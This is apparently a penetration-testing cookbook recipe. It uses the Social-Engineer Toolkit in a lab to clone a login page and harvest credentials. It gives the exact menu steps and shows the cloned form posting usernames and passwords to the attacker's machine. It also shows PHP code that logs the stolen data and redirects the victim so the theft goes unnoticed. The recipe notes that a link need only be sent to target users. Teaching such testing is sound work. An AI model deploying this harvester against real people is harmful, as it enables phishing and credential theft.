Social engineering attacks may be considered as a special kind of client-side attacks. In such attacks, the attacker has to convince the user that the attacker is a trustworthy counterpart and is authorized to receive the information the user has.
SET or the Social-Engineer Toolkit (https://www.trustedsec.com/social-engineer-toolkit/) is a set of tools designed to perform attacks against the human element; attacks, such as Spear-phishing, mass e-mails, SMS, rouge wireless access point, malicious websites, infected media, and so on.
In this recipe, we will use SET to create a password harvester web page and look at how it works and how attackers use it to steal a user's passwords.
- In a terminal, write the following command as root:
setoolkit
- In the
set>prompt, write1(forSocial-Engineering Attacks) and hit Enter. - Now select
Website Attack Vectors(option2). - From the following menu, we will use the
Credential Harvester Attack Method(option3). - Then select the
Site Cloner(option2). - It will ask for
IP address for the POST back in Harvester/Tabnabbing, which means the IP where the harvested credentials are going to be sent to. Here, we write the IP of our Kali machine in the host only network (vboxnet0):192.168.56.1. - Next, it will ask for the URL to clone; we will clone the Peruggia's login from our vulnerable_vm, write
http://192.168.56.102/peruggia/index.php?action=login. - Now, the cloning process will start; after that you will be asked if SET starts the Apache server, let's say yes for this time; write
yand hit Enter.
- Hit Enter again.
- Let's test our page, go to
http://192.168.56.1/.
Now we have an exact copy of the original login.
- Now, enter some username and password in it and click on Login. We will try
harvester/test. - You will see that the page redirects to the original login page. Now, go to a terminal and enter the directory where the harvester file is saved, by default it is
/var/www/htmlin your Kali Linux:cd /var/www/html - There should be a file named
harvester_{date and time}.txt - Display its contents and we will see all the information captured:
cat harvester_2015-11-22 23:16:24.182192.txt
And that's it; we just need to send a link to our target users for them to visit our fake login to harvest their passwords.
SET creates three files when it clones a site; first, an index.html, which is the copy of the original page and contains the login form. If we look at the code of the index.html file that SET created in /var/www/html in our Kali machine, we will find the following code:
<form action="http://192.168.56.1/post.php"http://192.168.56.1/index.php?action=login&check=1" method=post> <br> Username: <input type=text name=username><br> Password: <input type=password name=password><br> <br><input type=submit value=Login><br> </form>
Here, we can see that the username and password will be sent to post.php in 192.168.56.1 (our Kali machine) when submitted, that is the second file that SET creates. All this file does is read the contents of the POST request and write them into a harvester_{date and time}.txt file, the third file created by SET and the one that will store the information submitted by users. After writing the data in the file, the <meta> tag redirects to the original login page, so the user will think that they wrote something incorrect in their username or password:
<?php $file = 'harvester_2015-11-22 23:16:24.182192.txt'; file_put_contents($file, print_r($_POST, true), FILE_APPEND); ?> <meta http-equiv="refresh" content="0; url=http://192.168.56.102/peruggia/index.php?action=login" />